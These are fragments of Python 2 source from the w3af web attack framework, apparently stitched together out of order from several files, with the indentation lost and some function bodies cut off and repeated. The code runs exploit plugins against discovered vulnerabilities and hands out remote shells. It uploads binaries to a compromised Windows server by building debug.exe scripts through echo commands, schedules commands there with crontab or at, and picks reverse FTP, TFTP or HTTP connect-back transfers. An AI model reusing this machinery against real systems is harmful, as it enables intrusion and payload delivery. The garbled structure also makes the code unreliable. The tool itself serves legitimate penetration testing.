def _exploit( self , pluginName, params, showList=True):
'''
Exploits a vuln. using a single plugin.
'''
# Did the user indicated what vulnerability to exploit ?
if len( params ) == 1:
try:
vulnToExploit = params[0]
if vulnToExploit != '*':
vulnToExploit = int(params[0])
except:
raise w3afException( 'You specified an invalid vulnerability id.' )
else:
vulnToExploit = None
if pluginName not in self._configs:
raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' )
else:
self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )
try:
response = plugin.canExploit( vulnToExploit )
except w3afException, e:
raise e
else:
def _configExploit( self, params ):
if len( params ) == 0:
raise w3afException( 'Plugin name was expected.')
if len( params ) > 1:
raise w3afException( 'Unexpected parameters: ' + ','.join(params[1:]) )
pluginName = params[0]
if pluginName not in self._configs:
raise w3afException( "Unknown plugin " + pluginName)
return self._configs[pluginName]
def transfer( self, strObject, destination ):
'''
This method is used to transfer the strObject from w3af to the compromised server.
'''
om.out.debug('Starting upload.')
self._filename = self._getFilename( destination )
# Check if echo exists and works as expected
if not self._exec_methodutedCanTransfer:
if not self.canTransfer():
raise w3afException('Failed to transfer file to the compromised server, echoWin.canTransfer returned False.')
# if exists, delete _filename
res = self._exec_method('del ' + self._filename )
# Prepare the scr file.
self._exec_method( 'echo n ' + self._filename + '._ >> ' + self._filename )
self._exec_method( 'echo r cx' + ' >> ' + self._filename )
self._exec_method( 'echo ' + hex(len(strObject))[2:] + ' >> ' + self._filename)
self._exec_method( 'echo f 0000 ffff 00' + ' >> ' + self._filename )
# http://www.totse.com/en/technology/computer_technology/windowsdebugco172680.html
i = 0
j = 256
while i < len( strObject ):
# Prepare the command
cmd = "echo e " + hex(j)[2:]
for c in strObject[i:i+self._step]:
cmd += ' ' + hex(ord(c))[2:].zfill(2)
cmd += " >> " + self._filename
i += self._step
j += self._step
# Send the command to the remote server
self._exec_method( cmd )
# "close" the scr file
self._exec_method( 'echo w >> ' + self._filename )
self._exec_method( 'echo q >> ' + self._filename )
# Now, I transform the text file into a exe
# this trick was taken from sqlninja!
om.out.debug('Transforming the text file into a binary file. Thanks to icesurfer and sqlninja for this technique!')
res = self._exec_method( 'debug < ' + self._filename )
if 'file creation error' in res.lower():
raise w3afException('Error in remote debug.exe command.')
extension = self._getExtension( destination )
om.out.debug('Changing the extension of the binary file to match the original one ()')
res = self._exec_method( 'move ' + self._filename + '._ ' + self._filename + '.' + extension )
def _createCronLine( self, remoteDate, commandToExec ):
'''
Creates a crontab line that executes the command one minute after the "date" parameter.
@return: A tuple with the new line to add to the crontab, and the time that it will take to run the command.
'''
resLine = ''
try:
# date +"%d-%m-%H:%M:%S-%u"
dayNumber, month, hour, weekDay = remoteDate.split('-')
except:
raise w3afException('The date command of the remote server returned an unknown format.')
else:
hour, minute, sec = hour.split(':')
waitTime = None
if int(sec) > 57:
# Just to be 100% sure...
delta = 2
waitTime = 4 + 60
else:
delta = 1
waitTime = 60 - int(sec)
minute = int( minute ) + delta
hour, minute, amPm = self._fixTime( hour, minute )
resLine = str( minute ) + ' ' + str(hour) + ' ' + str(dayNumber) + ' ' + str(month) + ' ' + str(weekDay) + ' ' + commandToExec
return resLine, waitTime
def _cmd_fastexploit( self , parameters, showList=True):
'''
Performs fast exploiting based on the parameters provided by the user, and
the previous plugin configuration.
'''
# I need this to have logging!
self._w3af.plugins.init_plugins()
if not len( parameters ):
om.out.console( 'Incorrect call to fastexploit, please see the help:' )
self._cmd_help( ['fastexploit'] )
else:
pluginName = parameters[0]
if pluginName not in self._w3af.plugins.getPluginList('attack'):
om.out.console( 'Unknown plugin. Use the list command to view available plugins.' )
else:
self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )
try:
exploit_result = plugin.fastExploit()
except Exception, e:
raise
# Assign a unique identifier to this shell
for i in range(len(self._exploitResults), len(exploit_result) ):
exploit_result[i].setExploitResultId( i )
if not exploit_result:
raise w3afException( 'Failed to exploit vulnerability.')
else:
self._exploitResults.extend( exploit_result )
om.out.console( 'Vulnerability successfully exploited. ' , newLine=not showList )
if showList:
self._show()
om.out.console( 'Please use the interact command to interact with the shell objects.' )
def getPriority( self ):
'''
This function is called when sorting mangle plugins.
Each mangle plugin should implement this.
@return: An integer specifying the priority. 100 is runned first, 0 last.
'''
raise w3afException('Plugin is not implementing required method getPriority' )
def getDelayedExecutionHandler( self ):
os = osDetectionExec( self._execMethod )
if os == 'windows':
return atHandler( self._execMethod )
elif os == 'linux':
return crontabHandler( self._execMethod )
else:
raise w3afException('Failed to create a delayed execution handler.')
def mangleResponse(self, response ):
'''
This method mangles the response.
This method MUST be implemented on every plugin.
@param response: This is the response to mangle.
@return: A mangled version of the response.
'''
raise w3afException('Plugin is not implementing required method mangleResponse' )
def _createAtCommand( self, time, command ):
'''
Creates an at command based on the time and command parameter.
This is the format i'm expecting for the time parameter:
The current time is: 11:24:19.59
Enter the new time:
@return: A tuple with the "at" command, and the time that it will take to run the command.
'''
res = 'at '
try:
time = time.split('\n')[0].split(':')[1:]
hour = time[0]
minute = time[1]
if '.' in time[2]:
# windows 2k
seconds = time[2].split('.')[0]
else:
# windows XP. This assholes reimplement the time command from one release to another...
seconds = time[2].split(',')[0]
# TODO ( see below )
if int(hour) > 12:
amPm = ''
else:
# TODO !
# analyze... before I had amPm = 'a' ; check if this is really necesary
amPm = ''
except:
raise w3afException('The time command of the remote server returned an unknown format.')
else:
if int(seconds) > 57:
# Just to be 100% sure...
delta = 2
waitTime = 60 + 5
else:
delta = 1
waitTime = 60 - int(seconds)
minute = int( minute ) + delta
hour, minute, amPm = self._fixTime( hour, minute, amPm )
res += str(hour) + ':' + str( minute ).zfill(2) + amPm + ' ' + command
return res, waitTime
def _exploitAll( self, params ):
lp = len(params)
stopOnFirst = len(params)>0 and params[0] =='stopOnFirst'
maxLen = int(stopOnFirst)
if len(params)>maxLen:
raise w3afException( 'Unexpected parameters: ' + \
','.join(params[maxLen:]))
vuln_list = kb.kb.getAllVulns()
if not vuln_list:
om.out.console('They are no vulnerabilities to exploit.')
else:
attackPluginList = self._w3af.plugins.getPluginList( 'attack' )
#Now I create the instances...
instanceList = []
for pluginName in attackPluginList:
instanceList.append( self._w3af.plugins.getPluginInstance( pluginName, 'attack' ) )
# Its time to sort...
def sortfunc(x,y):
# reverse ordering...
return cmp( y.getRootProbability(), x.getRootProbability() )
instanceList.sort( sortfunc )
# To have a nicer console ;)
not_run = []
continue_exploiting = True
# Exploit !
for ap in instanceList:
if not continue_exploiting:
break
if not ap.canExploit():
# save to report later
not_run.append(ap.getName())
else:
# can exploit!
msg = 'Executing '+ ap.getName() +'.attack plugin to all vulnerabilities:'
om.out.console( msg )
for vuln_obj in vuln_list:
continue_exploiting = True
msg = '- Exploiting vulnerability with id:' + str(vuln_obj.getId())
om.out.console( msg )
try:
self._exploit( ap.getName() , vuln_obj.getId(), showList=False )
except w3afException, w:
continue_exploiting = True
om.out.console( str(w) )
else:
# We get here when the exploit was successful
if stopOnFirst:
continue_exploiting = False
break
om.out.console('')
msg = 'The following plugins weren\'t run because they can\'t exploit any of the'
msg += ' previously discovered vulnerabilities: ' + ', '.join(not_run)
om.out.console( msg )
om.out.console('')
if self._exploitResults:
self._show()
om.out.console( 'Please use the "interact" command to use the shell objects.' )
raise w3afException( 'You specified an invalid vulnerability id.' )
else:
vulnToExploit = None
if pluginName not in self._configs:
raise w3afException( 'Unknown plugin. Use the list command to view available plugins.' )
else:
self._plugin = plugin = self._w3af.plugins.getPluginInstance( pluginName, 'attack' )
try:
response = plugin.canExploit( vulnToExploit )
except w3afException, e:
raise e
else:
if not response:
raise w3afException( 'No exploitable vulnerabilities found.' )
else:
try:
exploit_result = plugin.exploit( vulnToExploit )
except w3afMustStopException, w3mse:
raise w3afException( str(w3mse) )
except w3afException, w3:
raise w3
else:
# everything went ok!
if not exploit_result:
raise w3afException( 'Failed to exploit vulnerability.')
else:
# Assign a unique identifier to this shell
for i in range(len(self._exploitResults), len(exploit_result) ):
exploit_result[i].setExploitResultId( i )
def getSpeed( self ):
'''
@return: The transfer speed of the transfer object. It should return a number between 100 (fast) and 1 (slow)
'''
raise w3afException('You should implement the getSpeed method when you inherit from echo.')
def transfer( self, strObject, destination ):
'''
This method is used to transfer the strObject from w3af to the compromised server,
'''
raise w3afException('You should implement the transfer method when you inherit from basePayloadTransfer.')
def estimateTransferTime( self, size ):
'''
@return: An estimated transfer time for a file with the specified size.
'''
raise w3afException('You should implement the estimateTransferTime method when you inherit from basePayloadTransfer.')
def canTransfer( self ):
'''
This method is used to test if the transfer method works as expected. Usually the implementation of
this should transfer 10 bytes and check if they arrived as expected to the other end.
'''
raise w3afException('You should implement the canTransfer method when you inherit from basePayloadTransfer.')
try:
if not inboundPort:
inboundPort = self._es.getInboundPort()
except w3afException, w3:
om.out.error( 'The extrusion test failed, no reverse connect transfer methods can be used. Trying inband echo transfer method.' )
om.out.error( 'Error: ' + str(w3) )
except Exception, e:
om.out.error('Unhandled exception: ' + str(e) )
else:
to_test.append( reverseFTP( self._exec_method, os, inboundPort ) )
if os == 'windows':
to_test.append( clientlessReverseTFTP( self._exec_method, os, inboundPort ) )
elif os == 'linux':
to_test.append( clientlessReverseHTTP( self._exec_method, os, inboundPort ) )
# Test the fastest first and return the fastest one...
def sortFunction( x ,y ):
return cmp( y.getSpeed() , x.getSpeed() )
to_test.sort( sortFunction )
for method in to_test:
om.out.debug('Testing if "' + str(method) + '" is able to transfer a file to the compromised host.')
if method.canTransfer():
om.out.debug('The "' + str(method) + '" method is able to transfer a file to the compromised host.')
return method
else:
om.out.debug('The "' + str(method) + '" method *FAILED* to transfer a file to the compromised host.')
raise w3afException('Failed to transfer a file to the remote host! All the transfer methods failed.')
